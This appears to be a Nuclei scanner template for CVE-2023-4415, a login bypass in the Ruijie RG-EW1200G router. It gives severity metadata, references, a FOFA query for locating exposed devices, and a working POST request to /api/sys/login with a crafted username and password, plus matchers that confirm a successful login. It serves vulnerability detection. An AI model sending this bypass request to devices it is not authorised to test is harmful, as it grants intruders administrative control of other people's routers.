id: CVE-2023-4415 info: name: Ruijie RG-EW1200G Router Background - Login Bypass author: DhiyaneshDK severity: high description: | A vulnerability was found in Ruijie RG-EW1200G 07161417 r483. It has been rated as critical. Affected by this issue is some unknown functionality of the file /api/sys/login. The manipulation leads to improper authentication. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-237518 is the identifier assigned to this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-4415 - https://github.com/blakespire/repoforcve/tree/main/RG-EW1200G-logic - https://vuldb.com/?ctiid.237518 - https://vuldb.com/?id.237518 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-4415 cwe-id: CWE-287 epss-score: 0.00355 epss-percentile: 0.68878 cpe: cpe:2.3:o:ruijienetworks:rg-ew1200g_firmware:07161417_r483:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ruijienetworks product: rg-ew1200g_firmware fofa-query: body="app.2fe6356cdd1ddd0eb8d6317d1a48d379.css" tags: cve,cve2023,ruijie,router,ruijienetworks http: - method: POST path: - "{{BaseURL}}/api/sys/login" body: | { "username":"2", "password":"admin", "timestamp":1695218596000 } matchers-condition: and matchers: - type: word part: body words: - '"result":"ok"' - '"msg":"登入成功"' condition: and - type: word part: header words: - application/json - type: status status: - 200 # digest: 4a0a00473045022073c43cfe65b20bbd583363b17b1f2d084107def289d50e4effbddfde2189c530022100be5cc6d5bfb35f6e44a2be9e90bf44c7ea89888898a673c3af047aedfe01c143:922c64590222798bb761d5b6d8e72950